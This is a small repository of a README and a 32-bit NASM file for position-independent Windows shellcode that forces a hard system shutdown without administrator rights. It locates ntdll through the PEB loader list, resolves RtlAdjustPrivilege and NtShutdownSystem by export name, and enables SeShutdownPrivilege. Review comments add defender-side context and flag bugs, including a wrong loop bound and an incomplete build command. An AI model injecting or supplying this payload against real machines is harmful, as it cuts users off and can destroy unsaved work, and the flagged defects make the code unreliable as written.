├── README.md
└── ntshutdown.asm
/README.md:
--------------------------------------------------------------------------------
# ntshutdown-shellcode
Windows hard shutdown shellcode. Don't need administrator rights.

# compile

nasm -f ntshutdown.asm -o ntshutdown.bin

# tested
Windows 10 X64/86
Windows 7 X64/86
Windows 8/8.1 x64/86
--------------------------------------------------------------------------------
/ntshutdown.asm:
--------------------------------------------------------------------------------
;-----------------------------------------------------------------------
; ntshutdown.asm - position-independent 32-bit x86 code that locates
; ntdll.dll through the PEB loader list, resolves NtShutdownSystem and
; RtlAdjustPrivilege from its export directory by name, enables
; SeShutdownPrivilege (19) on the process token and calls
; NtShutdownSystem(ShutdownNoReboot).
;
; Syntax: NASM, Intel operand order.  Assembled with BITS 32, so every
; structure offset below (fs:[0x30], PEB+0xc, PE32 export directory at
; PE header +0x78) is the x86 layout; on x64 Windows this only applies
; inside a 32-bit (WoW64) process.
;
; Why no administrator rights are needed: nothing here elevates.  The
; code only enables a privilege the calling token already holds, and
; SeShutdownPrivilege (the "Shut down the system" user right) is held by
; ordinary interactive users by default on the client Windows versions
; listed in the README.  The defender-side control is therefore the
; user-right assignment (and detection of the PEB-walk / export-name
; comparison pattern below, which is a common shellcode signature), not
; access control on the API itself.
;
; NOTE(review): the README's build line `nasm -f ntshutdown.asm` omits
; the output-format argument that -f takes (e.g. `-f bin`) -- confirm.
;
; Register roles (see `start`):
;   ebx      = delta-offset base, pointing at the strings under `data`
;   esi      = address of NtShutdownSystem
;   edi      = address of RtlAdjustPrivilege
;   [ebp-4]  = ntdll.dll base
;   [ebp-8]  = ntdll export directory (VA)
;   [ebp-12] = RtlAdjustPrivilege's BOOLEAN *Enabled output
;-----------------------------------------------------------------------
BITS 32

global _start
section .text

_start:

; Local variables:
;
; [ebp-4]  Address of ntdll.dll
; [ebp-8]  Address of ntdll.dll's export table
; [ebp-12] Space for RtlAdjustPrivilege's output

        push    ebp
        mov     ebp,esp
        sub     esp,12

; Save registers (restored at `exit`)

        push    ebx
        push    esi
        push    edi

        jmp     get_delta_offset        ; Get the delta offset

get_delta_offset2:
        pop     ebx                     ; ebx = return address pushed by the call below = address of `data`
        jmp     start                   ; Jump to main code

get_delta_offset:
        call    get_delta_offset2       ; Pushes the address of the next byte, i.e. `data`

; The two strings are contiguous and NOT NUL-terminated: the resolver
; compares exactly `*_len` bytes, and `start` advances ebx by the first
; length to reach the second string.  This block is never executed.
data:
NtShutdownSystem_s db "NtShutdownSystem"
NtShutdownSystem_len equ $-NtShutdownSystem_s

RtlAdjustPrivilege_s db "RtlAdjustPrivilege"
RtlAdjustPrivilege_len equ $-RtlAdjustPrivilege_s

;-----------------------------------------------------------------------
; get_function_address - look up an export of ntdll.dll by name
; In:    edx = pointer to the (unterminated) name, ecx = its length
;        [ebp-4] = ntdll base, [ebp-8] = export directory VA
; Out:   eax = address of the export, or 0 if the loop bound is reached
; Clobb: ecx, edx (both overwritten on the found path), flags
; Preserves ebx, esi, edi via push/pop.
;
; Export-directory offsets used: +0x1c AddressOfFunctions,
; +0x20 AddressOfNames, +0x24 AddressOfNameOrdinals (all RVAs).
;
; NOTE(review): only `ecx` bytes are compared and the terminator is
; never checked, so an export whose name merely starts with the wanted
; string would also match.  The names array is sorted, so the exact
; name is reached first for the two names used here, but the lookup is
; not exact.
;-----------------------------------------------------------------------
get_function_address:

; Save registers

        push    ebx
        push    esi
        push    edi

        mov     eax,[ebp-8]
        mov     ebx,[eax+0x20]          ; ebx = AddressOfNames RVA

        add     ebx,[ebp-4]             ; ebx now points to the export names array (VA)
        xor     eax,eax                 ; eax = name index

.get_function_address_loop:
        mov     esi,edx                 ; esi now points to the wanted name
        mov     edi,[ebx+eax*4]
        add     edi,[ebp-4]             ; edi now points to the export name

        push    ecx                     ; Save the function name length (rep cmpsb consumes ecx)
        cld                             ; Clear the direction flag

        rep     cmpsb                   ; Compare ecx bytes; ZF=1 only if all were equal
        pop     ecx                     ; Restore the length

        je      .get_function_address_end
        inc     eax

; NOTE(review): ebx points at the names array here, not at the export
; directory, so [ebx+0x14] is the sixth name RVA rather than
; NumberOfNames ([export dir+0x18]).  The loop only terminates because
; that RVA is a large value; a name that is absent can read past the
; end of the arrays before the 0 return is reached.  Signed `jl` is
; used on an index.
        cmp     eax,[ebx+0x14]
        jl      .get_function_address_loop

.get_function_address_fail:
        pop     edi
        pop     esi
        pop     ebx

        xor     eax,eax                 ; Return 0 = not found
        ret

.get_function_address_end:
        mov     ebx,[ebp-8]
        mov     ecx,[ebx+0x1c]

        add     ecx,[ebp-4]             ; ecx now points to the function addresses array

        mov     edx,[ebx+0x24]
        add     edx,[ebp-4]             ; edx now points to the ordinals array

        movzx   eax,word [edx+eax*2]    ; eax now holds the ordinal
        mov     eax,[ecx+eax*4]         ; eax now holds the RVA of the function

        add     eax,[ebp-4]             ; eax now holds the address of the function

; Restore registers

        pop     edi
        pop     esi
        pop     ebx

        ret

;-----------------------------------------------------------------------
; start - main code.  Entered with ebx = address of `data`.
;
; NOTE(review): the module walk below takes the second entry of
; InMemoryOrderModuleList without checking its name; it relies on that
; entry being ntdll.dll, as it is on the versions listed in the README.
;-----------------------------------------------------------------------
start:

        xor     ecx,ecx
        mov     eax,[fs:ecx+0x30]       ; eax now points to the PEB (x86 TEB+0x30)

        mov     eax,[eax+0xc]           ; eax = PEB.Ldr (PEB_LDR_DATA)
        mov     eax,[eax+0x14]          ; eax = Ldr.InMemoryOrderModuleList.Flink (first entry = the exe itself)

        mov     eax,[eax+ecx]           ; eax = that entry's Flink = second module in memory order
        mov     eax,[eax+0x10]          ; eax now holds the address of ntdll.dll (DllBase, +0x10 from InMemoryOrderLinks)

        mov     [ebp-4],eax             ; Save the address of ntdll.dll

        add     eax,[eax+0x3c]          ; eax now points to the PE header (e_lfanew)
        mov     eax,[eax+0x78]          ; eax = export directory RVA (PE32 optional header DataDirectory[0])
        add     eax,[ebp-4]             ; eax now points to the export table (VA)

        mov     [ebp-8],eax
        xor     ecx,ecx

        mov     cl,NtShutdownSystem_len
        mov     edx,ebx                 ; edx = "NtShutdownSystem"

        add     ebx,ecx                 ; Move to next string (ebx is preserved by the callee)
        call    get_function_address

        test    eax,eax
        je      exit                    ; Not found: restore registers and return

        mov     esi,eax                 ; esi = NtShutdownSystem (survives the stdcall below)
        xor     ecx,ecx

        mov     cl,RtlAdjustPrivilege_len
        mov     edx,ebx                 ; edx = "RtlAdjustPrivilege"

        call    get_function_address

        test    eax,eax
        je      exit

        mov     edi,eax                 ; edi = RtlAdjustPrivilege
        xor     eax,eax

; Enable SeShutdownPrivilege
; RtlAdjustPrivilege(Privilege=19, Enable=TRUE, CurrentThread=FALSE, &Enabled)
; stdcall: arguments pushed right to left, callee cleans the stack.
; The NTSTATUS result is discarded (`xor eax,eax` below); if the token
; does not hold the privilege, NtShutdownSystem is still called and is
; expected to fail rather than shut the system down.

        lea     ecx,[ebp-12]

        push    ecx                     ; &Enabled (previous state, BOOLEAN)
        push    eax                     ; CurrentThread = FALSE (adjust the process token)
        push    1                       ; Enable = TRUE
        push    19                      ; SeShutdownPrivilege (SE_SHUTDOWN_PRIVILEGE)

        call    edi                     ; Call RtlAdjustPrivilege
        xor     eax,eax                 ; Status ignored; eax = 0 = ShutdownNoReboot

        push    eax                     ; ShutdownNoReboot
        call    esi                     ; Call NtShutdownSystem; presumably returns only on failure, status ignored

exit:

        pop     edi
        pop     esi
        pop     ebx

        mov     esp,ebp
        pop     ebp
        ret